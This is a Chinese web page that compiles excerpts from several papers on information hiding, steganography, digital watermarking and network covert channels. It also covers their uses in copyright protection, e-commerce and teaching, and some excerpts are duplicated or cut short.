欢迎访问发表云网!为您提供杂志订阅、期刊投稿咨询服务!

隐藏技术论文大全11篇

时间:2022-08-18 04:17:50

隐藏技术论文

隐藏技术论文篇(1)

 

一、关于信息隐藏

所谓的信息隐藏,是利用媒体信息普遍存在的冗余特性,将秘密信息隐藏在其他媒体信息中,其首要目标就是使加入隐藏信息后的媒体目标的质量下降,尽可能地小,使人无法觉察到隐藏的数据,或者知道它的存在,但未经授权者无法知道它的位置。并不像传统加密过的文件一样,看起来是一堆会激发非法拦截者破解机密资料动机的乱码,而是看起来和其它非机密性的一般资料无异,因而十分容易逃过非法拦截者的破解。其道理如同生物学上的保护色,巧妙地将自己伪装隐藏于环境中,免于被天敌发现而遭受攻击。被人们誉为历史学之父的古希腊历史学家希罗多德(Herodotus, 486―425),在其著作中讲述了这样一则故事:一个名叫Histaieus的人筹划着与他的朋友合伙发起叛乱,里应外合,以便推翻波斯人的统治。他找来一位忠诚的奴隶,剃光其头发并把消息刺在头皮上,等到头发又长起来了,把这人派出去送“信”,最后叛乱成功了。

信息隐藏技术是20世纪90年代中期从国外兴起的一门集多学科理论与技术与一身的新兴技术领域,它涉及感知科学、信息论、密码学等多个学科领域,涵盖信号处理、扩频通信、图像处理等多种专业技术的研究方向。

人的眼睛或耳朵本身对某些信息都有一定的掩蔽效应,利用人的这些特点,可以很好地将信息隐藏而不被察觉。信息隐藏过程一般由密钥来控制,通过嵌入算法将有意义的信息即嵌入对象隐藏于掩护对象中,从而生成隐密载体,隐密载体通过信道传输到接受端。在密钥的控制下采用特定的提取算法从隐藏载体中提取出嵌入对象,利用密钥从中恢复或检测出隐藏的秘密信息,从而使用户获得真实可靠的信息。使非法者不知道这个载体信息中是否隐藏了其它的信息,而且即使知道,也难以提取隐藏的信息,从而实现信息的保密。

据目前已经提出的信息隐藏算法,从它们对载体的修改方式上进行分类,可以分为:时域(空域)替换技术、变换域技术、扩展频谱技术、统计方法等等。

二、信息隐藏的特点

利用不同的媒体进行信息掩藏时有着不同的特点,但是它们都必须具有下列基本特征。

1.隐蔽性。指嵌入信息后在不引起秘密信息质量下降的前提下,不显著改变掩护对象的外部特征,即不引起人们感官上对掩护对象变化的察觉。以使非法拦截者无法判断是否有秘密信息的存在。

2.不可测性。指隐蔽载体与原始载体具有一致的特性,即非法拦截者要检测到秘密信息的存在并提取出来应相当困难,至少在秘密信息的有效期内是不可能的。

3.不可见性。利用人类视觉系统和听觉系统的属性,经过一系列隐藏处理, 使目标资料没有明显的降质现象,而隐藏的资料却无法人为地看见或听见.

4.鲁棒性。指不因图像文件的某种改动而导致隐藏信息丢失的能力。这里所谓“改动”包括传输过程中的隐藏载体对一般的信号处理(如滤波、增强、重采样、有损压缩等)、一般的几何变换(如平移、旋转、缩放、分割等)和恶意攻击等情况,即隐藏载体不会因为这些操作而丢失了隐藏的秘密信息。

5.自恢复性。论文大全。指经过了一些操作和变换后,可能会使隐蔽载体受到较大的破坏,如果只留下部分的数据,在不需要宿主信号的情况下,却仍然能恢复隐藏信息的特征就是所谓的自恢复性。

6.安全性。指隐藏算法有较强的抗攻击能力,即它必须能够承受一定程度的人为攻击,而使隐藏信息不会被破坏。

三、信息隐藏的应用

在信息安全领域中,信息隐藏技术的应用可归结为下列几个方面。

1.数字知识产权保护

知识产权保护是信息隐藏技术中数字水印技术和数字指纹技术所力图解决的重要问题,信息隐藏技术的绝大部分研究成果都是在这一应用领域中取得的。随着网络和数字技术的快速普及,通过网络向人们提供的数字服务也会越来越多,如数字图书馆、数字图书出版、数字电视、数字新闻等。这些服务提供的都是数字产品,数字产品具有易修改、易复制、易窃取的特点,因此,当前的数字知识产权保护就已经成为迫切需要解决的实际问题。

信息隐藏技术应用于版权保护时,所嵌入的签字信号通常被称作“数字水印”,数字水印技术可以成为解决此难题的一种方案。现在越来越多的视频信号、音频信号和数字图像中被贴上了不可见的标签,用以防止非法拷贝和数据跟踪。服务提供商在向用户发送产品的同时,将双方的信息代码以水印的形式隐藏在作品中,这种水印从理论上讲应该是不被破坏的。论文大全。当发现数字产品在非法传播时,可以通过提取出的水印代码追查非法散播者。其主要特点是版权保护所需嵌入的数据量小,对签字信号的安全性和鲁棒性要求很高。

2.数据完整性鉴定

使用数字水印技术有一定的缺陷,用于数字水印技术保护的媒体一旦被篡改水印就会被破坏,从而很容易被识别。在数字票据中隐藏的水印经过打印后仍然存在,可以通过再扫描回数字形式,提取防伪水印,以证实票据的真实性。数据完整性鉴定是指对某一信号的真伪或完整性的判别,并需要进一步指出该信号与原始真实信号的差别,以确认资料在网上传输或存储过程中并没有被篡改、破坏或丢失。假定接收到一个如音频、视频或图像等多媒体信号,并初步判断它很可能是某一原始真实信号的修改版本,数据篡改验证的任务就是在对原始信号的具体内容不可知的情况下,以最大的可能判断是否是真实的。首先,要充分利用数据库管理系统提供的数据完整性的约束机制和各种输入数据的引用完整性约束设计,以便保证数据完整、准确的输入和储存。其次,在数据传输过程中可视情况选用相应的数据校验方式对传输数据进行校验检查。

3.数据保密

在网络上传输秘密数据要防止非法用户的截获和使用,这是网络安全的一个重要内容,随着信息技术的发展以及经济的全球化,这一点不仅涉及政治、军事领域,还将涉及到商业、金融机密和个人隐私。信息隐藏技术为网上交流的信息采取了有效的保护,比如电子政务中敏感信息、电子商务中的秘密协议和合同、网上银行交易的重要数据、重要文件的数字签名以及个人隐私等,还可以对一些不愿为别人所知道的内容使用信息隐藏方式进行隐藏储存,从而使数据得到保密,保证了信息的安全性。论文大全。

4.资料不可抵赖性的确认

在网上交易中,交易双方的任何一方不能抵赖自己曾经做出的行为,也不能否认曾经接收到对方的信息,这是交易系统中一个重要环节。这可以使用信息隐藏技术,在交易体系的任何一方发送和接收信息时,将各自的特征标记形式加入到传递的信息中,这些标记应是不能被去除的,从而达到确认其行为的目的。

结论

总之,信息隐藏技术是多媒体通信和多媒体信号处理领域中近年来新兴的研究方向,它为信息安全提供了一种新的思路,为我们研究信息安全提供了一个新的方向.

目前国际上先进的信息隐藏技术已能做到隐藏的信息可以经受人的感觉检测和仪器的检测,并能抵抗一些人为的攻击。但总的来说,信息隐藏技术尚没有发展到可实用的阶段,使用密码加密仍是网络信息传输的主要安全手段。虽然目前对信息隐藏的研究有了很大的进展,在信息安全中起到了重要的作用,但存在大量的实际问题亟待解决,如信息隐藏的容量问题,如何建立不可感知性的数学度量模型,信息隐藏的容量上界如何计算等;信息隐藏的对立面――隐藏分析如何得到同步发展;如何对信息隐藏进行分析和分类;如何找到信息隐藏技术自己的理论依据,形成完善和科学的理论体系等等。

信息隐藏是一项崭新的技术领域,也是多媒体技术、网络技术研究的前沿,应用前景十分广阔,必将吸引广大图像、语音、网络、人工智能等领域的研究者加入到这一行列,从而推动信息安全技术更快的发展。

参考文献:

[1] 张作林,陈建华.基于区域的信息隐藏技术[J].福建电脑,2005,3.

[2] 张书真.信息安全中的信息隐藏技术[J].电脑知识与技术.2005,18.

[3] 陈 波,谭运猛,吴世忠.信息隐藏技术综述[J].计算机与数字工程.2005,2.

[4] 左伟明,秦姣华.信息隐藏技术研究[J].湖南城市学院学报.2005,3.

隐藏技术论文篇(2)

通常人们认为对信息加密就可以保证通讯的安全,但是在网络传输中仅仅使用加密技术通常是不够的。现代密码学开发出来的加解密系统不管是对称密钥系统(如des),还是安全性更高的公开密钥系统(rsa),经过加密算法处理所生成的密文具有随机性、不可读,反而明确提示了保密信息的存在,因而很容易引起监控者的注意,并以此为依据进行对密文的破译或对发送者和接收者的攻击。采用加密技术的另一个潜在缺点是随着计算机硬件的迅速发展,具有并行计算能力的破解技术的日益成熟,仅通过增加密钥长度来达到增强安全性已不再是唯一的可行方法。因此,近年来国际上出现了信息隐藏技术,它是一种不同于密码术的技术,它在电子商务中安全体系中必将起到重要作用。

一、信息隐藏技术的含义与方法

信息隐藏技术(information hiding),也称作数据隐藏(data hiding),它是集多学科理论与技术于一身的新兴技术领域。信息隐藏技术主要是指将特定的信息嵌入数字化宿主信息(如文本、数字化的声音、图像、视频信号等)中,它的目的不在于限制正常的信息存取和访问,而在于保证隐藏的信息不引起监控者的注意和重视,从而减少被攻击的可能性,在此基础上再使用密码术来加强隐藏信息的安全性,因此信息隐藏比信息加密更为安全。应该注意到,密码术和信息隐藏技术不是互相矛盾、互相竞争的技术,而是相互补充的技术,他们的区别在于应用的场合不同,对算法的要求不同,但可能在实际应用中需要互相配合。特定的信息一般就是保密信息,信息隐藏的历史可以追溯到古老的隐写术,但推动了信息隐藏的理论和技术研究始于1996年在剑桥大学召开的国际第一届信息隐藏研究会,之后国际机构在信息隐藏领域中的隐写术、数字水印、版权标识、可视密码学等方面取得大量成果。

信息隐藏是一个十分活跃的研究领域,虽然其载体可以是文字、图像、语音或视频等不同格式的文件,但使用的方法没有本质的区别。因此,下面将以信息隐藏技术在图像中的应用即遮掩消息选用数字图像的情况为例进行说明。

在图像中应用的信息隐藏技术基本上可分为两大类:时域法或频域法。时域法就是直接改变图像元素的值,一般是在图像的亮度或色带中加入隐藏的内容。这种方法比较有代表性的是最不重要比特位(the least significant bits,lsb)方法,该方法也是最早被应用的信息隐藏方法。遮掩消息的lsb直接被待隐消息的比特位或两者之间经过某种逻辑运算的结果所代替。lsb算法的主要优点是可以实现高容量和较好的不可见性。但是该算法容易被第三方发现并得到,遭到破坏,而对图像的各种操作如压缩、剪切等,都会使算法的可靠性受到影响。为了增强算法的性能,提出了各种改进的方法,如利用伪序列,以“随机”的顺序修改图像的叠像技术(lsm);在使用密钥的情况下,才能得到正确的嵌入序列等。频域法是利用某种数学变换,将图像用频域表示,通过更改图像的某些频域系数加入待隐信息,然后再利用反变换来生成隐藏有其他信息的图像。各种不同的数学变换都可以被使用,目前已有的方法主要集中在小波变换、频率变换、dct(低频分量)变换等。

二、信息隐藏技术在电子商务中的应用

目前信息隐藏技术在电子商务中的应用主要体现在以下几个方面:

1.数据保密

在具体电子商务活动中,数据在internet上进行传输一定要防止非授权用户截获并使用,如敏感信息、谈判双方的秘密协议和合同、网上银行交易中的敏感数据信息、重要文件的数字签名和个人隐私等等。另外,还可以对一些不愿为别人所知道的内容使用信息隐藏的方式进行隐藏存储。

2.数据的不可抵赖性

在网上交易中,交易双方的任何一方不能抵赖自己曾经做出的行为,也不能否认曾经接收到的对方的信息,这是交易系统中的一个重要环节。这可以使用信息隐藏技术中的水印技术,在交易体系的任何一方发送或接收信息时,将各自的特征标记以水印的形式加入到传递的信息中,这咱水印应是不能被去除的,可达到确认其行为的目的。

3.防伪

商务活动中的各种票据的防伪也是信息隐藏技术的用武之地。在数字票据中隐藏的水印经过打印后仍然存在,可以通过再扫描回数字形式,提取防伪水印,以证实票据的真实性。

4.数据的完整性

隐藏技术论文篇(3)

通常人们认为对信息加密就可以保证通讯的安全,但是在网络传输中仅仅使用加密技术通常是不够的。现代密码学开发出来的加解密系统不管是对称密钥系统(如des),还是安全性更高的公开密钥系统(rsa),经过加密算法处理所生成的密文具有随机性、不可读,反而明确提示了保密信息的存在,因而很容易引起监控者的注意,并以此为依据进行对密文的破译或对发送者和接收者的攻击。采用加密技术的另一个潜在缺点是随着计算机硬件的迅速发展,具有并行计算能力的破解技术的日益成熟,仅通过增加密钥长度来达到增强安全性已不再是唯一的可行方法。因此,近年来国际上出现了信息隐藏技术,它是一种不同于密码术的技术,它在电子商务中安全体系中必将起到重要作用。

一、信息隐藏技术的含义与方法

信息隐藏技术(information hiding),也称作数据隐藏(data hiding),它是集多学科理论与技术于一身的新兴技术领域。信息隐藏技术主要是指将特定的信息嵌入数字化宿主信息(如文本、数字化的声音、图像、视频信号等)中,它的目的不在于限制正常的信息存取和访问,而在于保证隐藏的信息不引起监控者的注意和重视,从而减少被攻击的可能性,在此基础上再使用密码术来加强隐藏信息的安全性,因此信息隐藏比信息加密更为安全。wWw.133229.COm应该注意到,密码术和信息隐藏技术不是互相矛盾、互相竞争的技术,而是相互补充的技术,他们的区别在于应用的场合不同,对算法的要求不同,但可能在实际应用中需要互相配合。特定的信息一般就是保密信息,信息隐藏的历史可以追溯到古老的隐写术,但推动了信息隐藏的理论和技术研究始于1996年在剑桥大学召开的国际第一届信息隐藏研究会,之后国际机构在信息隐藏领域中的隐写术、数字水印、版权标识、可视密码学等方面取得大量成果。

信息隐藏是一个十分活跃的研究领域,虽然其载体可以是文字、图像、语音或视频等不同格式的文件,但使用的方法没有本质的区别。因此,下面将以信息隐藏技术在图像中的应用即遮掩消息选用数字图像的情况为例进行说明。

在图像中应用的信息隐藏技术基本上可分为两大类:时域法或频域法。时域法就是直接改变图像元素的值,一般是在图像的亮度或色带中加入隐藏的内容。这种方法比较有代表性的是最不重要比特位(the least significant bits,lsb)方法,该方法也是最早被应用的信息隐藏方法。遮掩消息的lsb直接被待隐消息的比特位或两者之间经过某种逻辑运算的结果所代替。lsb算法的主要优点是可以实现高容量和较好的不可见性。但是该算法容易被第三方发现并得到,遭到破坏,而对图像的各种操作如压缩、剪切等,都会使算法的可靠性受到影响。为了增强算法的性能,提出了各种改进的方法,如利用伪序列,以“随机”的顺序修改图像的叠像技术(lsm);在使用密钥的情况下,才能得到正确的嵌入序列等。频域法是利用某种数学变换,将图像用频域表示,通过更改图像的某些频域系数加入待隐信息,然后再利用反变换来生成隐藏有其他信息的图像。各种不同的数学变换都可以被使用,目前已有的方法主要集中在小波变换、频率变换、dct(低频分量)变换等。

二、信息隐藏技术在电子商务中的应用

目前信息隐藏技术在电子商务中的应用主要体现在以下几个方面:

1.数据保密

在具体电子商务活动中,数据在internet上进行传输一定要防止非授权用户截获并使用,如敏感信息、谈判双方的秘密协议和合同、网上银行交易中的敏感数据信息、重要文件的数字签名和个人隐私等等。另外,还可以对一些不愿为别人所知道的内容使用信息隐藏的方式进行隐藏存储。

2.数据的不可抵赖性

在网上交易中,交易双方的任何一方不能抵赖自己曾经做出的行为,也不能否认曾经接收到的对方的信息,这是交易系统中的一个重要环节。这可以使用信息隐藏技术中的水印技术,在交易体系的任何一方发送或接收信息时,将各自的特征标记以水印的形式加入到传递的信息中,这咱水印应是不能被去除的,可达到确认其行为的目的。

3.防伪

商务活动中的各种票据的防伪也是信息隐藏技术的用武之地。在数字票据中隐藏的水印经过打印后仍然存在,可以通过再扫描回数字形式,提取防伪水印,以证实票据的真实性。

4.数据的完整性

隐藏技术论文篇(4)

网络通信的安全极为重要,早年大家是通过对网络信息的加密处理来保护信息的安全,但是随着计算机技术的不断发展破译技术已经很成熟,早年用密文加密对手段已经没有办法保证信息的安全,要知道信息一旦被破译有可能不仅仅是财产损失,很多个人信息也会无法受到保护,由此就产生了信息的隐蔽方法。

1.1隐蔽通信技术在国内外的现状与发展趋势

信息隐蔽技术是通过对信息进行处理然后通过信道进行信息的传送,就是通过载体把信息变为隐蔽信息载体。目前的隐蔽通本文由收集整理信技术研究还是基于数字认证安全和版权的认证,另一方面就是对信息的加密。早在上世纪80年代美国就信息安全问题下达过信息安全指令,而我国在1999年也下达了相同的指令,学者表示通过网络数据流来隐蔽通信技术是可以实施的,隐蔽通信技术也就此成为了研究热议的话题。

1.2网络流隐蔽通信技术的优势

网络数据不是静态的而是动态的,从出现到消失人们都难以捕捉,很多黑客也无法拦截到准确的信息,这是网络数据的优势之一,可以利用其动态的特性。

网络世界报传送的信息量是十分巨大的,每分每秒都有数以万计的网络数据包在传送,利用网络数据包来隐蔽通信技术很可行,它有自身独特的特性和优势,可以保护信息安全。

1.3隐蔽通信技术存在的问题和研究目的

传统的隐蔽通信技术很容易被检测器检测出来,只有对协议进行分析就很容易发现隐蔽信道,所以传统的隐蔽通信技术隐藏能力低。通过算法可以估计信道内信息传输量,传统的信息隐蔽技术通过数据包头可以隐蔽的信息量很少,所以隐蔽通信技术还存在信息容量小的问题。而我们研究的目的就是为了提高信息的存储量,提升信息容量的算法就是当务之急,并且研究目的也在于提高网络流对信息通讯的隐蔽性。

2隐蔽通信信道的探究

2.1时间信道的报文延迟

在tic通道中,传递符号“0”的时间为si0,传递符号“1”的时间为si1。下面我们分别从信道容量和平均传递时间两方面讨论影响信息传送的因素。在实际网络中,报文的延迟时间是变化的,从而导致了同一报文发送间隔会对应多种可能的报文到达间隔。对一发送间隔而言,到达时间间隔将分布在以该发送间隔为中心一段区域内。到达间隔分布越集中,解码中的误码率越低,信道容量就越大。

2.2隐蔽信道存在的必要条件

隐蔽信道是隐蔽在网络通信下的另一种通信方式,它

的存在就是问了实现隐蔽通信。隐蔽信道是可行的,从信息理论角度,信息的输出和输入是有着必然的联系,隐蔽信道从正常的输入端输入,隐蔽信息的接收方从正常的信道接收这样就可以实现信息的隐蔽,其中必须具备以下的条件;(1)传送放和接收方的共享资源属性和权限必须相同;(2)必须能够控制传送方和接收方之间的通信,能够调节传输的顺序;(3)必须满足时间特性双方都参考一个时钟。网络时间信道可以作为载体把传送方和接收方联系起来,传送者改变报文时间特性接收者可以第一时间检查出被改变的时间报文对其进行解读。

2.3隐蔽时间信道特性分析

计算机网络中传输的相邻报文往往是不在相同的网络环境下,所以在网络传送的时间上是有差别的,根据相邻报文的时间差来接收隐蔽的通信信息是隐蔽信息技术的有效途径之一,但是相邻报文的传送存在一定的误码率,所以要最大限度的提升信息容量,隐蔽信息技术必须提高对网络环境的抗干扰能力。信息隐藏算法中主要有两种算法,其中有空间域算法,其中最具代表性的就是lsb算法。对于扩展时间信道的容量我们必须加强对算法的研究。

隐藏技术论文篇(5)

【Abstract】This paper analyses the teaching and experiment contents of information security lesson in computer applied technology, explores the teaching and experiment arrangement of stegnagraphy according to the development of information hiding and its important degree in information security technology.

【Key words】Stegnagraphy; Information security lesson; Teaching and experiment contents

0 前言

信息安全技术是计算机领域的一门涉及计算机科学、网络技术、通信技术、密码技术等多种学科和技术的综合性学科,课程的理论性强,涉及的知识面宽,对学生的理论与实践两方面的要求均较高。

目前,信息安全技术是计算机学科中发展最快的专业之一[1]。经典的信息安全技术[2]包括:密码技术、防火墙技术、防入侵技术、病毒技术、黑客攻防技术、数据库安全技术、安全管理等,这些内容都在信息安全技术的教学和实验中设置了相应的章节,既给学生奠定信息安全理论基础,又强化动手能力,树立理论联系实际的观念。随着计算机网络的发展、相关基础学科的发展、现代社会信息化的发展,信息安全技术也在不断的发展和丰富。

信息隐藏技术作为信息安全中的一项重要技术,近十年来引起了国内外学术界的重视,出于对保护多媒体产品知识产权的需求,出于密码技术的局限性而又必须进行隐密通信的特殊需求,信息隐藏中的数字水印技术和数字密写技术得到了迅速发展。因此,鉴于当前本科信息安全技术课程中缺乏讲授信息隐藏内容的不足,本文针对信息隐藏技术的发展及其在信息安全技术中所占地位的重要程度,从教学内容与实验内容两个方面探讨信息隐藏在信息安全技术本科课程中的设置安排,以期丰富和完善信息安全技术在本科阶段的教学和实践。

1 信息隐藏的发展和特点

信息隐藏技术是利用公开、有实际意义的多媒体数据,将某一机密信息秘密地隐藏于另一公开信息中,通过对公开信息的传输来传送秘密信息,拦截者难以从公开信息中判断秘密信息的存在性,从而保证秘密信息的安全性。随着多媒体技术的发展,信息隐藏技术作为信息安全和管理及知识产权保护等领域的主要手段,正得到广泛的研究与应用[3]。

20世纪90年代以来,信息隐藏技术已经成为信息安全领域的一大研究热点。这种技术的一个重要应用领域就是数字水印(Digital Watermarking),它着眼于在多媒体数据中嵌入标记,以保护数字媒体知识版权或进行多媒体认证,主要包括易损水印和稳健水印二个分支。随着版权保护的重要性和紧迫性日益突出,数字水印日益受到重视而得到快速发展。

除了用于版权保护的数字水印外,信息隐藏的另一重要分支是数字密写(Steganography)和密写分析(Steganalysis)。数字密写是将秘密信息隐藏在公开载体信息中,使得在传递公开载体的同时传递秘密信息并且不被人察觉。与数字水印不同的是,数字密写着眼于隐藏信息本身的隐秘性,以达到秘密通信的目的,其基本要求是隐藏信息具有足够的嵌入容量和极高的安全性,但对稳健性要求不高。目前,文本、三维模型、图像、音频、视频都已经成为数字密写技术的载体,除了用于军事目的外,数字密写技术正向着视音频产品、远程教学、医学信号处理、移动多媒体通信等广泛的民用和商业领域发展。而密写分析是一种与密写相对抗的技术,其目的在于分析、提取、还原/破坏隐藏的秘密信息,其重要性体现在二个方面:一方面,以各种手段分析检测密写信息的存在,可以寻找敌对隐蔽信息的信源,阻断隐蔽通信的通道;另一方面,密写分析研究可以反过来促进密写技术的发展,增强隐蔽通信的安全性;如研究针对常规的信号处理和攻击方法,可以提高密写算法的鲁棒性;研究相关的分析检测理论模型可以评估、改进信息隐藏算法性能;研究针对性地选取载体信号可以提高密写算法不可感知性,进一步增强算法的安全性等。

从以上信息隐藏的内容可知,信息隐藏的特点在于:

1)涉及计算机科学、通信理论、计算机图形学、计算机图形图像处理、信息编码、信号处理、数理统计、视听觉特性等领域的知识和技术,是一个跨越多个学科的领域,因此教学内容涉及面广,对学生的先修课程和基础知识要求较高。

2)信息隐藏技术在不断的攻防过程中不断发展,其知识内容更新快,实践性强,必须要安排实验实训,让学生自己去应用,才能真正地掌握、理解和应用。

鉴于以上信息隐藏的内容和特点,鉴于信息隐藏的研究有着现实的意义和广阔的应用前景,非常有必要在信息安全课程中添加信息隐藏领域的教学和实验内容。

2 信息隐藏教学内容设置

信息隐藏教学的目的是:使学生全面掌握信息安全技术领域的专业知识,培养学生的专业技能和创新素质。为此,需按照知识―能力―素质结构的要求,有针对性的设计信息隐藏教学内容,合理的制定教学计划。

在信息隐藏教学内容的设置上,应该遵循下述基本理念:

1)信息隐藏领域包括两大分支:数字水印和数字密写,分别有着不同的应用领域,因此在教学内容的设置上,应该二者并重。

2)由于信息隐藏的载体多种多样,包括文本、三维模型、图像、音频、视频等,而教学课时有限,不可能兼顾所有类型载体的信息隐藏技术,因此在教学内容的设置上,应该选择发展最早、最快、应用范围最广的图像信息隐藏作为教学主线。

3)鉴于信息隐藏仅仅是信息安全技术将教学中的一个方面,因此综合考虑教学内容和教学量的占比,分配10个学时的总教学时间,其中理论教学6个学时,实验教学4个学时。

按信息安全技术应用型人才的培养要求,信息隐藏教学可包含以下内容:

1)2个学时的数字水印技术及其应用。

教学内容包括:数字水印的一般性框架和模型;数字水印的分类;数字水印的经典算法;数字水印的经典应用;数字水印攻击及性能评价;数字版权保护系统及其组成。

由于数字水印主要包含空域算法和变换域算法,因此选取Patchwork算法作为空域经典算法和基于离散余弦变换的数字水印算法作为变换域经典算法作为教学内容,使学生掌握数字水印的基本原理及其应用方法。

2)2个学时的数字密写技术及其应用。

教学内容包括:数字密写的一般性框架和模型;数字密写的分类;数字密写的经典算法;数字密写的经典应用;数字密写的性能评价。

由于数字密写主要包含空域算法和变换域算法,因此选取LSB算法作为空域经典算法和基于离散余弦变换的F5算法作为变换域经典算法作为教学内容,使学生掌握数字密写的基本原理及其应用方法。

3)2个学时的密写分析技术。

教学内容包括:密写分析的一般性框架和模型;密写分析分类;密写分析的经典算法;针对密写分析的改进密写技术。

由于密写分析主要分为专用密写分析和盲密写分析,因此选取LSB密写分析作为专用密写分析算法和针对F5算法的JPEG密写分析作为变换域密写分析算法作为教学内容,使学生掌握密写分析原理和思路。

3 信息隐藏实验内容设置

信息安全技术实验教学的目的[4]是更好的将理论教学的知识点有机的融入到具体的实践中去,使学生不仅能够通过实验理解和掌握理论教学的内容,还能培养和锻炼学生的分析能力、综合解决问题能力和实际动手能力。

配合教学内容中的重要知识点,信息隐藏实验的设置采用技能性、设计性实践教学相结合的方式,共设置4个学时,包含2个实验,其中1个为验证性实验,1个为设计性实验。

1)验证性实验

采用独立实验的形式进行模拟实验,共包含2个验证性实验:第一个实验是W-SVD数字水印算法的验证实验,掌握水印生成、水印嵌入、水印检测三个步骤;通过算法参数取值的不同,验证水印的不可见性特性;通过图像压缩、图像模糊化、中值滤波、马赛克处理等攻击手段,验证水印的鲁棒性特性。通过实验使学生对水印原理和应用有感性认识,促进学生掌握数字水印的相关知识点;第二个实验是基于离散余弦变换的F5图像密写算法的验证实验,掌握待嵌入密写信息的预处理、原始图像的JPEG压缩处理、密写信息嵌入、密写图像生成四个步骤;通过算法参数取值的不同,验证密写信息对图像的不可感知性的影响。通过实验使学生对密写原理和应用有感性认识,促进学生掌握数字密写的相关知识点。

2)设计性实验

采用分组的形式进行模拟实验,每组2人,学生可从明确实验任务、工作分工、遇到问题及时确定解决方案、认真撰写实验报告等几个方面来进行有组织、有计划的实验。具体的实验项目是:应用matlab编程实现可视化LSB密写及其密写分析,包括可视化界面设计、待嵌入密写信息的预处理、LSB密写嵌入、密写信息的提取验证、LSB密写分析算法及其结果显示等模块,使学生通过实验掌握数字密写的实现过程和功能,掌握密写分析的原理及测试密写分析算法的检测性能。这样,通过设计性实验,培养和锻炼了学生的分析能力、综合解决问题能力和实际动手能力。

4 结束语

信息隐藏是现代信息安全技术中的一项重要内容。通过近二年在实际教学中的实践证明,在信息安全技术课程中加入信息隐藏的教学和实验内容,使学生更为全面的掌握了信息安全技术,一定程度上激发了学生的学习积极性,也锻炼了学生的实践技能和综合能力。从学生提交的实验报告可以看出,学生通过实验已基本掌握了信息隐藏的主要知识点,基本掌握了信息隐藏的设计和实现方法,达到了信息隐藏理论和实验教学的目的。

【参考文献】

[1]闻宏生.计算机网络安全与防护[M].北京:北京电子工业出版社,2007.

隐藏技术论文篇(6)

中图分类号:TN911.73 文献标识码:A 文章编号:1007-9416(2016)12-0200-01

计算机技术的发展使得各种工作都受益于此,大大减轻了人们的工作负担,然而随着计算机的广泛应用也引起了网络安全问题。当前单纯的密码技术已经不能满足大部分的用户需求,只利用密码技术经常会使得网络信息受到泄露,因而近年来国际上发明了这种数字图像信息隐蔽技术,本文对数字图像信息隐蔽技术进行了分析,希望能为相关人士提供帮助和借鉴。

1 数字图像信息隐蔽技术发展理论

1.1 信息隐蔽技术理论

信息隐蔽技术也被称为数据隐藏,信息隐蔽技术目前并没有一个明确的定义,但是通常人们会从广义和狭义上来理解信息隐蔽技术。广义分析中来看,数据隐藏主要有将信息隐秘起来和获得版权标志两个部分,从狭义中分析来看,数据隐藏就是将通信信息以隐秘的方式进行传递[1]。当前要想研究信息隐蔽技术一般都是从狭义之中出发。

1.2 信息隐蔽分类

信息隐蔽技术可以按照不同的标准分成几种类型,具体的有以下几种:

1.2.1 载体区别

信息隐蔽通过一定的载体可以完成隐蔽技术,在计算机中最经常成为隐蔽载体的就是文档、音频、视频、图像一类的载体类型,这种按照载体区别分成的类型中最常应用的是以数字图像为代表的载体,本文主要研究的也是这种类型的信息隐蔽技术。

1.2.2 保护对象区别

按照保护对象的区别,信息隐蔽技术可以分成隐写术和数字水印。

1.2.3 嵌入域区别

这种分类是基于载体对象的划分方式,可以分为空域方法和变换域方法。第一种是利用载体对象,用代替载体对象的方式隐蔽信息,选择载体对象中不甚重要的信息图像将其与隐藏信息进行替换;第二种是是将载体对象通过正交的方式进行变换,在变换之后利用载体对象在变换过程中产生的变换空间,将隐藏信息嵌入到空间中。

1.2.4 提取区别

信息隐蔽技术可以按照提取区别将其分成盲隐藏和非忙隐藏的类型。

1.2.5 密钥区别

密钥区别是按照隐藏信息的嵌入和提取时的密钥的应用来区别的,如果在嵌入和隐藏过程中利用的是同样的密钥,这种类型为对称隐藏算法,如果在嵌入和隐藏过程中利用的是不同的密钥,这种类型为公钥信息隐藏算法[2]。

1.3 信息[蔽特性

信息隐蔽技术属于隐藏信息的技术手段,因此要想使得信息在正常读取下不受到影响需要信息隐蔽技术具备几种特性。这些特性包括不可察觉性、不可检测性、安全性、鲁棒性、自恢复性、对称性和可纠错性。不可察觉性是说在对秘密信息进行隐蔽技术后不能影响载体对象自身品质的明显改变,就是说不能让人明显发现载体的外部区别改变,因此这种不可察觉性又被称为透明性。不可检测性十分明显,就是说明在利用隐蔽技术后载体对象内的隐藏信息即使受到非法拦截,也不会被判断出隐秘信息。安全性指的是在隐藏信息技术中要具备较强抗击性,在受到外来攻击和破坏时能够保证隐秘信息不会被发现。鲁棒性是指信息隐蔽技术本身不会随着文件的改变而失去隐藏技术效果。自恢复性是指隐蔽信息技术的伪装对象会因为各种原因失去部分数据,在这个时候能够根据存留下来的信息片段恢复信息隐蔽对象。对称性与可纠错性根据名称就可以判断出其特性,对称性要求在信息的隐藏和提取两个阶段具备对称的形式,减少信息存取的困难程度,可纠错性是指隐藏信号在改变之后仍然可以恢复如初,可供人修改错误之处。

2 数字图像信息隐蔽技术的应用

数字图像隐蔽技术在应用之中会通过两个方面来进行,一方面是为了隐藏信息,即在人工和信息统计中都没有察觉的前提下将隐秘信息嵌入到各种载体之中,这种研究是为了提高信息安全保障,也是应用数字图像信息隐蔽技术的重要部分;另一方面就是能够发觉隐藏在各种载体中的隐藏信息,从中获取隐秘信息。现如今,人们对于数字图像隐蔽技术的获取隐藏信息研究方面提高了重视,当前国防部署中对于数字图像信息隐蔽技术的应用尤其广泛,此项分析技术的研究更加深入。当然随着互联网的发展,人民生活之中应用到数字图像信息隐蔽技术的范围也越来越广泛,在很多行业与私人领域中都扮演了重要的角色[3]。

2.1 应用于信息数据安全中

随着网络技术的发展,各种黑客技术也在不断出现,当前的电信诈骗、互联网诈骗案情频发,这就使得信息数据安全急需得到保护。合理的运用数字图像隐蔽技术,能够有效的保护个人隐私,银行网络运行以及金融行业等各个方面。

2.2 应用于版权保护之中

当前互联网中的数字作品逐渐的代替了传统纸质的作品,像图书、电影、音乐等艺术产品也逐渐的向着数字类型发展,为了保护产品在互联网流通过程中的版权,就需要获得数字图像隐蔽技术的支持,以此作为保障著作人权益的技术要点。

3 结语

在互联网大环境下,人们的个人信息安全受到威胁,其他领域的发展也受到信息安全问题的困扰,因此,要想提高网络信息安全系数需要加强对数字图像隐蔽技术的研究和应用,以此来保证网络信息安全,保障各方人士的正当权益。

参考文献

隐藏技术论文篇(7)

